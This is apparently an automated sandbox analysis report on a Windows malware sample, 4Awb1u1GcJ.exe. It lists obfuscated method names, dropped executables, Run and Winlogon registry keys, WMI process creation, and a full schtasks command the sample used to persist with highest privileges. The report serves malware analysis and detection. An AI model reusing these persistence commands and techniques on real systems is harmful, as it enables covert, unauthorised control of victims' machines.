Source: 4Awb1u1GcJ.exe, BZS9scQMe9y9qXAWadO.cs	High entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'BPhdNFf7Sfp', 'jiBdvoiSVYC', 'EsAxXZd8tEr5ENCR1Rg0', 'z32B7od8Ud9LhJ6oG3Dd', 'neCasNd8huSfwlyOIfVm', 'nJ48bed8Ru0BVFcCc0b9', 'C5LWqtd8nNY1JNUxVqDN'
Source: 4Awb1u1GcJ.exe, Gkwn9VvgKdVPFLf5x4g.cs	High entropy of concatenated method names: 'VZq', 'KZ3', 'XA4', 'imethod_0', 'e23', 'bqwdN2npTAH', 'Am5dvdUKZ6E', 'qa0uj3dI5rS39RsI4Qgp', 'FvNHcNdIOd3A0gdlGEKw', 'R96EOIdIyQy82WvPkEB5'
Source: 4Awb1u1GcJ.exe, wrDVrHj9xLuRxip8sLW.cs	High entropy of concatenated method names: 'KCLj0jNIqo', 'dxdjJH0J0n', 'R3ZvnbdCfikt7VQkPTDr', 'hmek7vdCXlLKEqg7XqZi', 'AjnqYwdCPc78ROeJMbck', 'cuejb97ZVB', 'qlNjZpPBW6', 'A11joLiK08', 'eqBjljoJqM', 'W8bj4dBGMS'
Source: 4Awb1u1GcJ.exe, OWeo0ZMsBxd5rGbM1q9.cs	High entropy of concatenated method names: 'nELdN5cyyF6', 'chCd1gv8pnT', 'bhSdGId0zWevGOA7YmMT', 'udZybSd06pHajc6HmBtM', 'cQ2kK8d0A0XpsRVqvnn0', 'N1yGlOdJiSgFIKMA7SOS', 'K8H3oYdJvq8I7lMD8nnx', 'AqYYKFdJwIHf8uea4Ifw', 'GGde0vdJ2cthJm3TiPqu', 'imethod_0'
Source: 4Awb1u1GcJ.exe, BZlxgvVWOj4En7xi8pt.cs	High entropy of concatenated method names: 'TlqVMdrNMw', 'ikPVHZTgpv', 'r2lV063vAW', 'xgcVJC347n', 't31VuqRZh6', 'eZYZELdb801AN0YcYCYv', 'pp0mjEdb9EAfU8Pg5Rfy', 'bJKvNHdbrOjDq5IG3ouq', 'NkSpJ3dbbmPe82byCpLP', 'pO1rd2dbZM1RBsq0hhN9'
Source: 4Awb1u1GcJ.exe, XJ0VOENOvG1mgqZbsVn.cs	High entropy of concatenated method names: 'uk7NLdxXYR', 'zyGNI9wy2C', 'gffNaTwtGI', 'yQHNcibN50', 'yvvN7GIkPK', 'aXaNCeW9rb', 'apo485dC3ll2GIe5nBQy', 'cKO9ZkdCMUuAeFvJVgSJ', 'U9tHfUdCHZpKMI89alOh', 'FRWsSLdC0kKQlykw4PMN'
Source: 4Awb1u1GcJ.exe, qYegoPKU6bBgOI0VnT1.cs	High entropy of concatenated method names: 'vZsBIsdrf6hjAKIf038V', 'fhQiFNdrFFKZ9nDt6ev5', 'xQVZvxdrXn7jM9BprNCq', 'cp2LRMdrPcZJ2H0cf1OE', 'method_0', 'method_1', 'Bp8KR8Dbvx', 'nAPKnJ9B34', 'uYcKQb7ni5', 'qJdKxjihxm'
Source: 4Awb1u1GcJ.exe, uOu89b1CRI9uS6dyg7C.cs	High entropy of concatenated method names: 'P83', 'KZ3', 'TH7', 'imethod_0', 'vmethod_0', 'c3SdNXrSxdf', 'Am5dvdUKZ6E', 'PvnXVKdcbf9B7k9udeWG', 'rpCSrTdcZ1kUHuP55lc5', 'VwLUhZdcoluAyFCT9NXY'
Source: 4Awb1u1GcJ.exe, wESobRCSRupMChAbt9L.cs	High entropy of concatenated method names: 'Jfy6icdWDx5bIB26aj1Z', 'NkobXJdWlTdY4DFPtwul', 'bfM4tJdW4mhYjC089Lc2', 'h0RKqJdWSKyUJn6wYxmB', 'M4WC3Pjgt1', 'Mh9', 'method_0', 'D1MCMfLw51', 'CBWCH1kZnh', 'MMoC0q9BSk'
Source: 4Awb1u1GcJ.exe, rZFrPXwGlXrnqN16ebO.cs	High entropy of concatenated method names: 'JdcwjcqEsl', 'dDCwNIPMkl', 'FEowEpMKwE', 'uoPwXfRJKa', 'KPykPwdytVBlZFk1EyDl', 'fp79LGdyFvVONwl0Sw4r', 'YYjPPUdypiEt2i7WF1mN', 'BIE2wcdyUnalQJ4HH8Lo', 'A1aRHgdyhedst1KvOZ5e', 'KhyfLndyR0RebHbRRfiq'
Source: 4Awb1u1GcJ.exe, ECcO2JO9WEM96SyKhP0.cs	High entropy of concatenated method names: 'kTkO6KxW35', 'VTIOzDgn8S', 'QQCObH4M6C', 'wIQOZi4fEg', 'IniOo3dis2', 'fTKOljv2FK', 'Xp3O4K5weu', 'OrxODZfYQT', 'MM4OSGUIcr', 'aTROWkWKdx'
Source: 4Awb1u1GcJ.exe, oc4f1MtP8pT76bUYZP7.cs	High entropy of concatenated method names: 'Dispose', 'wDPtFrotoC', 'jJKtpg7PGM', 'aiCttdHxfk', 'drATcKds0vPL48rcSqyH', 'jJ6cGxdsJkPgYpDT9hZm', 'lYqEnPdsuJawYRDR30Xy', 'PjbAJYds6o8vG497LIoa', 'mMQxyxdsAO3a3LVo1Ep0', 'UcHkAsdszqc5BBsC66xp'
Source: 4Awb1u1GcJ.exe, VRBshWQBhsHdxjyvVMR.cs	High entropy of concatenated method names: 'BEdQoLonf8', 'exAQlbk2iX', 'H7PQ4Iie8W', 'DVjHacd8GZGCSckD7jv2', 'waNUdVd814xty3djTnRo', 'nnDw9Xd8jWlbEftXPbgt', 'DnFQ8IjRjK', 'w9jQ9Lphfa', 'ioCQrGATQ4', 'gxDWlcd8dD8rUtpCHE7s'
Source: 4Awb1u1GcJ.exe, E5JuGacKcKxg4UD7jJi.cs	High entropy of concatenated method names: 'Uel7pGSWYP', 'sJ7UX6dSavvdSUT8s52J', 'cuwMpOdSLXB0hebwTX0I', 'ztk9NodSIrw1VBBcEBLc', 'nBcjTZdScbTttuybOiOx', 'kt5', 's8icTSk0tA', 'ReadByte', 'get_CanRead', 'get_CanSeek'
Source: 4Awb1u1GcJ.exe, SqIHKWyAWF9gmWw3pu1.cs	High entropy of concatenated method names: 'kI7LiLvCqc', 'tQjLdCiF6D', 'qI6LwTTLh5', 'pS5L2HcL9k', 'PZiLvWE3aN', 'WZULG4n1oF', 'uR2RSadlBmpyK37UG7UW', 'Es3OyrdlYKrGd2dun32O', 'lnepRLdlsXfUMXl0YxO4', 'VqLIwOdlkJqLkr3U8JxM'
Source: 4Awb1u1GcJ.exe, Hu4tFOR8i8LVfk1W68.cs	High entropy of concatenated method names: 'zbBC3qHAv', 'L1jw3Md5a1Yrqf5NyZVs', 'Ep0t0kd5cKUJ8ejsfKPv', 'vdqsLFd5L0i2XhYJJV76', 'UP4MZLd5I4bb6Dgb4adi', 'bUkQcTGgv', 'askxnu28S', 'NWHKeQerY', 'GqRqK5DqE', 'TGrT4B4fI'
Source: 4Awb1u1GcJ.exe, TApuQJBZapiwZb9KxEm.cs	High entropy of concatenated method names: 'NAvdNelSoAi', 'XiABlnfRGG', 'M4ZB4fKXM1', 'JATBDiClga', 'h8IHpedMESEIbfyIyufB', 'PxeLIBdMX8gXVdGtrtqc', 'vCmHhFdMPGq1gVO7vhDK', 'eRFkOadMfWVqLhHWBEIR', 'liUSXYdMF7OkNFNBHIUC', 'hpAqVldMpm2WUmQADngg'
Source: 4Awb1u1GcJ.exe, BvaGvkJR0ZUgiF8QlEp.cs	High entropy of concatenated method names: 'beP1KSduHIl5rC6xq3Vq', 'DYIUYxdu0u2RlclP7P4G', 'VW7uMIiEMl', 'MkAHGLduAeP5BNyo8fI4', 'yTKXo7duz8f4RINayOVL', 'tVFpyRd6iYoyUk2If0T6', 'FwaafWd6d0JKhWDqi6H9', 'I51I08d6wRp1mQqmQnxy', 'aSfZaXd62vPuiRmLev1Y', 'YfGp6Cd6vw2C4iPIiXUn'
Source: 4Awb1u1GcJ.exe, BYoAS7ja5lToSiPSoAA.cs	High entropy of concatenated method names: 'qv4j7sRrxx', 'QB0jC2GLeU', 'hve9dfd7Hq28JBbURiq1', 'KKg1JEd73wqIy7lbEhyg', 'BWjOTMd7MhvKio7xvMMo', 'yRiPvGd70cFYCIJrBf9T', 'cLtD6Bd7JWSHdWTnA6r2', 'QbqGVkd7uibsAC4Ng9a0', 'y7HtVcd76QIs7XhuCj4B', 'v0aRd0d7AWM3i2XeTu43'

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

System file written: C:\Windows\System32\SecurityHealthSystray.exe

Jump to behavior

Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	File created: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	File created: C:\Users\user\Desktop\RrNkXoHQ.log	Jump to dropped file
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	File created: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Jump to dropped file
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	File created: C:\Users\user\Desktop\greisgmx.log	Jump to dropped file
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Jump to dropped file
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	File created: C:\Users\user\Desktop\uJayprRQ.log	Jump to dropped file
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	File created: C:\Users\user\Desktop\IETDQDzo.log	Jump to dropped file
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	File created: C:\Users\user\Desktop\cOkJseIw.log	Jump to dropped file
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	File created: C:\Users\user\Desktop\YOJaOqPH.log	Jump to dropped file
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	File created: C:\Users\user\Desktop\kaHiFPLi.log	Jump to dropped file
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	File created: C:\Users\user\Desktop\pnhXwyoY.log	Jump to dropped file
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hxpWOXgnBGVLArPcwqxpuA.exe	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

File created: C:\Windows\System32\SecurityHealthSystray.exe

Jump to dropped file

Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	File created: C:\Users\user\Desktop\greisgmx.log	Jump to dropped file
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	File created: C:\Users\user\Desktop\YOJaOqPH.log	Jump to dropped file
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	File created: C:\Users\user\Desktop\IETDQDzo.log	Jump to dropped file
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	File created: C:\Users\user\Desktop\pnhXwyoY.log	Jump to dropped file
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	File created: C:\Users\user\Desktop\cOkJseIw.log	Jump to dropped file
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	File created: C:\Users\user\Desktop\RrNkXoHQ.log	Jump to dropped file
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	File created: C:\Users\user\Desktop\uJayprRQ.log	Jump to dropped file
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	File created: C:\Users\user\Desktop\kaHiFPLi.log	Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior

Creates multiple autostart registry keys

Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4Awb1u1GcJ	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhost	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run hxpWOXgnBGVLArPcwqxpuA	Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe

Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "hxpWOXgnBGVLArPcwqxpuAh" /sc MINUTE /mo 13 /tr "'C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe'" /rl HIGHEST /f

Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run hxpWOXgnBGVLArPcwqxpuA	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run hxpWOXgnBGVLArPcwqxpuA	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run hxpWOXgnBGVLArPcwqxpuA	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run hxpWOXgnBGVLArPcwqxpuA	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhost	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhost	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhost	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhost	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4Awb1u1GcJ	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4Awb1u1GcJ	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4Awb1u1GcJ	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4Awb1u1GcJ	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run hxpWOXgnBGVLArPcwqxpuA	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run hxpWOXgnBGVLArPcwqxpuA	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run hxpWOXgnBGVLArPcwqxpuA	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run hxpWOXgnBGVLArPcwqxpuA	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run hxpWOXgnBGVLArPcwqxpuA	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run hxpWOXgnBGVLArPcwqxpuA	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run hxpWOXgnBGVLArPcwqxpuA	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run hxpWOXgnBGVLArPcwqxpuA	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run hxpWOXgnBGVLArPcwqxpuA	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run hxpWOXgnBGVLArPcwqxpuA	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run hxpWOXgnBGVLArPcwqxpuA	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run hxpWOXgnBGVLArPcwqxpuA	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
